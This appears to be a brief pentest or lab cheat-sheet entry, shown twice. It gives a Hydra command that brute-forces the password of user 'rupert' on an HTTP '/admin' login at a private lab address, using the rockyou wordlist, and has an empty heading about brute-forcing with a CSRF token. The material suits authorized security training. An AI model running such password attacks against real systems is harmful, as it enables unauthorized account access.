bruteforce
Hydra
// brute force with Hydra
sudo hydra -l rupert -P /usr/share/wordlists/rockyou.txt 10.102.8.222 -s 12345 http-get "/admin"
Brute with CSRF token
Last updated
Was this helpful?
Hydra
// brute force with Hydra
sudo hydra -l rupert -P /usr/share/wordlists/rockyou.txt 10.102.8.222 -s 12345 http-get "/admin"
Brute with CSRF token
Last updated
Was this helpful?